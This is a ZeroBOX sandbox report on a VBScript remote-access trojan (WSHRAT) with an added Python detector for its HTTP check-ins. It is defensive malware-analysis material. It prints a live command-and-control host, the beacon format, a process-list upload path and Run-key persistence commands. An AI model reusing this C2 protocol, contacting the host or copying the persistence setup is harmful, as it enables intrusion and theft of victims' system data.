Summary | ZeroBOX

wp.vbs

Category Machine Started Completed
FILE s1_win7_x6401 Dec. 14, 2023, 10:12 a.m. Dec. 14, 2023, 10:16 a.m.
Size 257.4KB
Type Non-ISO extended-ASCII text, with very long lines, with CRLF line terminators
MD5 4d09dbc70709eb2790c491dc476d508b
SHA256 8939bff041d3968fe34dd5ded9c609364d0c5f2989ff60b1703a8c557fe09d84
CRC32 46D5322F
ssdeep 384:LW0SXuLuL8qCMhqbxOsu4Xpj3Tu88+cIUL87V7yY/DR7g7gDJ1ecYkG3Vd2AjIjt:LW0t3Ifve
Yara None matched

Name Response Post-Analysis Lookup
chongmei33.publicvm.com 103.47.144.44
IP Address Status Action
103.47.144.44 Active Moloch
164.124.101.2 Active Moloch

Suricata Alerts

SID Signature Category Flows
2027447 ET MALWARE WSHRAT CnC Checkin  Malware Command and Control Activity Detected
    21 TCP flows 192.168.56.101 -> 103.47.144.44:7045, source ports 49163 and 49165-49184
2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1  Malware Command and Control Activity Detected
    20 TCP flows 192.168.56.101 -> 103.47.144.44:7045, the same source ports except 49170
2042823 ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain  Potentially Bad Traffic
    21 TCP flows 192.168.56.101 -> 103.47.144.44:7045, source ports 49163 and 49165-49184
2017968 ET HUNTING Suspicious Possible Process Dump in POST body  A Network Trojan was detected
    1 TCP flow, 192.168.56.101:49170 -> 103.47.144.44:7045
2027117 ET HUNTING Suspicious POST with Common Windows Process Names - Possible Process List Exfiltration  A Network Trojan was detected
    1 TCP flow, 192.168.56.101:49170 -> 103.47.144.44:7045 (the only flow on which the POST carried a body; see the 1465-byte /is-processes request in the send log below)
2034457 ET POLICY Observed DNS Query to DynDNS Domain (publicvm .com)  Potentially Bad Traffic
    1 UDP flow, 192.168.56.101:59002 -> 164.124.101.2:53

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW
    computer_name: TEST22-PC
    1 1 0
    (identical call logged 50 times)
domain chongmei33.publicvm.com
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceW
    root_path: C:\
    sectors_per_cluster: 8
    bytes_per_sector: 512
    total_number_of_clusters: 8362495
    1 1 0
    (20 calls logged; number_of_free_clusters per call, in order: 3252422, 3252418, 3252404, 3252404, 3252404, 3252404, 3252468, 1934588, 1934588, 3252416, 3252288, 3252288, 3252282, 3252282, 3252282, 3252282, 3252282, 3252282, 3252282, 3252281)
wmi select * from win32_logicaldisk
Time & API Arguments Status Return Repeated

Logged sequence: 6 x (InternetCrackUrlW + HttpOpenRequestW for /is-ready), then InternetReadFile returning the C2 reply "get-processes", then InternetCrackUrlW + HttpOpenRequestW for /is-processes, then 14 more /is-ready pairs (20 /is-ready pairs in total). The distinct records are:

InternetCrackUrlW
    url: http://chongmei33.publicvm.com:7045/is-ready
    flags: 0
    1 1 0

HttpOpenRequestW
    connect_handle: 0x00cc0008
    http_version: (empty)
    flags: 71303168 (0x04400000 = INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_KEEP_CONNECTION)
    http_method: POST
    referer: (empty)
    path: /is-ready
    1 13369356 0

InternetReadFile
    buffer: get-processes
    request_handle: 0x00cc000c
    1 1 0

InternetCrackUrlW
    url: http://chongmei33.publicvm.com:7045/is-processes
    flags: 0
    1 1 0

HttpOpenRequestW
    connect_handle: 0x00cc0008
    http_version: (empty)
    flags: 73400320 (0x04600000 = the flags above plus INTERNET_FLAG_NO_AUTO_REDIRECT)
    http_method: POST
    referer: (empty)
    path: /is-processes
    1 13369356 0
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wp reg_value wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wp reg_value wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
(each of the two rows above is logged 21 times)
wmi select * from antivirusproduct
wmi select * from win32_process
wmi select * from win32_operatingsystem
wmi select * from win32_logicaldisk
Time & API Arguments Status Return Repeated

The following five-call pattern is logged 10 times: InternetCrackUrlW, HttpOpenRequestW, a 1-byte send of "!" on socket 988, the HTTP request header on a fresh socket, and another 1-byte "!" on socket 988. Nine of the ten are /is-ready beacons (send sockets, in order: 1080, 1104, 1112, 1108, 1096, 1096, 1212, 1216, 1104; sent: 324 each); the 7th in the sequence is the /is-processes upload.

InternetCrackUrlW
    url: http://chongmei33.publicvm.com:7045/is-ready
    flags: 0
    1 1 0

HttpOpenRequestW
    connect_handle: 0x00cc0008
    http_version: (empty)
    flags: 71303168
    http_method: POST
    referer: (empty)
    path: /is-ready
    1 13369356 0

send
    buffer: !
    socket: 988
    sent: 1
    1 1 0

send
    socket: 1080
    sent: 324
    1 324 0
    buffer (line breaks restored; with CRLF terminators the header is exactly the 324 bytes reported):
    POST /is-ready HTTP/1.1
    Accept: */*
    Accept-Language: ko
    User-Agent: WSHRAT|7C6024AD|TEST22-PC|test22|Microsoft Windows 7 Professional KN |plus|nan-av|false - 2023-12-14|Visual Basic
    Accept-Encoding: gzip, deflate
    Host: chongmei33.publicvm.com:7045
    Content-Length: 0
    Connection: Keep-Alive
    Cache-Control: no-cache

send
    buffer: !
    socket: 988
    sent: 1
    1 1 0

/is-processes upload (7th request in the sequence):

InternetCrackUrlW
    url: http://chongmei33.publicvm.com:7045/is-processes
    flags: 0
    1 1 0

HttpOpenRequestW
    connect_handle: 0x00cc0008
    http_version: (empty)
    flags: 73400320
    http_method: POST
    referer: (empty)
    path: /is-processes
    1 13369356 0

send
    socket: 1112
    sent: 331
    1 331 0
    buffer: same header as above with the request line "POST /is-processes HTTP/1.1" and "Content-Length: 1465" (the body itself is not shown in this log)
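The check-in above is plain HTTP on port 7045 to a dynamic-DNS host. Everything the C2 learns about the victim at check-in travels in the User-Agent header; the command comes back in the response body ("get-processes", read via InternetReadFile), and the result is posted to a path named after the command ("/is-processes", Content-Length 1465). The Python below is an added example, not ZeroBOX or WSHRAT code: it parses the User-Agent layout observed in this report, classifies requests by path, and flags any check-in that carries a body. The field names bot_id, edition, flag and date are assumptions made here (the ID looks like a volume serial and "nan-av" matches the empty AntiVirusProduct WMI query above, but the page does not document the layout). The sample requests are rebuilt from the captured header with CRLF line terminators restored, and the /is-processes body is a 1465-byte placeholder, not the real process list.

```python
"""Parse and classify WSHRAT HTTP check-ins.

Added example for this report, not ZeroBOX or WSHRAT code. Field names for the
User-Agent layout are assumptions; the sample requests are rebuilt from the
header captured above with CRLF line terminators restored.
"""
import re
from typing import Optional

# Layout observed in the capture:
#   WSHRAT|<bot_id>|<hostname>|<username>|<os>|plus|<av>|<flag> - <date>|Visual Basic
# bot_id looks like a volume serial and "nan-av" matches the empty AntiVirusProduct
# WMI query in the report, but those readings are assumptions, not documented fields.
WSHRAT_FIELDS = ("family", "bot_id", "hostname", "username", "os",
                 "edition", "av", "flag_date", "lang")

# /is-ready is the idle poll (the C2 answered it with "get-processes");
# /is-processes carried the 1465-byte result back.
KNOWN_PATHS = {"/is-ready": "beacon-poll", "/is-processes": "process-list-upload"}


def parse_wshrat_ua(ua: str) -> Optional[dict]:
    """Return the beacon fields as a dict, or None if this is not a WSHRAT UA."""
    parts = [p.strip() for p in ua.split("|")]
    if len(parts) != len(WSHRAT_FIELDS) or parts[0] != "WSHRAT":
        return None
    info = dict(zip(WSHRAT_FIELDS, parts))
    # Split "<flag> - <date>" so the date is usable on its own.
    m = re.fullmatch(r"(\w+)\s*-\s*(\d{4}-\d{2}-\d{2})", info["flag_date"])
    if m:
        info["flag"], info["date"] = m.group(1), m.group(2)
    return info


def parse_http_request(raw: bytes) -> dict:
    """Minimal parser for the request line and headers of a raw HTTP/1.x request."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version,
            "headers": headers, "body": body}


def classify_checkin(raw: bytes) -> Optional[dict]:
    """Flag a raw request as a WSHRAT check-in and say what its path implies."""
    req = parse_http_request(raw)
    beacon = parse_wshrat_ua(req["headers"].get("user-agent", ""))
    if beacon is None:
        return None
    length = int(req["headers"].get("content-length", "0") or 0)
    return {
        "bot_id": beacon["bot_id"],
        "hostname": beacon["hostname"],
        "username": beacon["username"],
        "av": beacon["av"],
        "c2": req["headers"].get("host", ""),
        "path": req["path"],
        "kind": KNOWN_PATHS.get(req["path"], "command-result"),
        # A body on a check-in path means host data is leaving the machine.
        "exfil": req["method"] == "POST" and length > 0,
        "content_length": length,
    }


# Sample traffic, constructed from the header captured in this report.
UA = ("WSHRAT|7C6024AD|TEST22-PC|test22|Microsoft Windows 7 Professional KN |plus|"
      "nan-av|false - 2023-12-14|Visual Basic")


def build_request(path: str, body: bytes = b"") -> bytes:
    """Rebuild the captured request for `path`; the body is a placeholder."""
    header = (
        f"POST {path} HTTP/1.1\r\nAccept: */*\r\nAccept-Language: ko\r\n"
        f"User-Agent: {UA}\r\nAccept-Encoding: gzip, deflate\r\n"
        f"Host: chongmei33.publicvm.com:7045\r\nContent-Length: {len(body)}\r\n"
        f"Connection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
    )
    return header.encode("latin-1") + body


SAMPLE_POLL = build_request("/is-ready")
SAMPLE_UPLOAD = build_request("/is-processes", b"x" * 1465)

if __name__ == "__main__":
    for raw in (SAMPLE_POLL, SAMPLE_UPLOAD,
                b"GET / HTTP/1.1\r\nHost: example.test\r\nUser-Agent: curl/8.0\r\n\r\n"):
        print(classify_checkin(raw))
```

Rebuilding the header with CRLF terminators gives exactly the 324 and 331 bytes that the send calls above report, which pins the reconstruction to the capture. In a proxy or IDS pipeline the same parse_wshrat_ua check on the User-Agent is enough to raise the alert; the path classification adds what was taken when a body is present.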
Antivirus Result
FireEye VB:Trojan.Valyria.4537
Skyhigh VBS/Agent.dy
ALYac VB:Trojan.Valyria.4537
VIPRE VB:Trojan.Valyria.4537
Sangfor Malware.Generic-VBS.Save.d63cbaa2
Symantec VBS.Heur.SNIC
ESET-NOD32 VBS/Agent.OXW
Avast JS:Skiddo-A [Trj]
Cynet Malicious (score: 99)
Kaspersky Trojan.VBS.Agent.bdq
BitDefender VB:Trojan.Valyria.4537
NANO-Antivirus Trojan.Script.Agent.iwquii
MicroWorld-eScan VB:Trojan.Valyria.4537
Emsisoft VB:Trojan.Valyria.4537 (B)
F-Secure Malware.VBS/Dldr.Agent.VPTL
DrWeb VBS.Siggen.8176
Sophos VBS/DwnLdr-ACDC
Ikarus Trojan-Downloader.VBS.Agent
Google Detected
Avira VBS/Dldr.Agent.VPTL
Arcabit VB:Trojan.Valyria.D11B9
ZoneAlarm Trojan.VBS.Agent.bdq
GData VB:Trojan.Valyria.4537
Varist VBS/Dunihi.A
McAfee VBS/Agent.dy
MAX malware (ai score=85)
Rising Trojan.Agent/VBS!8.11E09 (TOPIS:E0:xxVsk5TjtcJ)
Fortinet VBS/Agent.OXW!tr
AVG JS:Skiddo-A [Trj]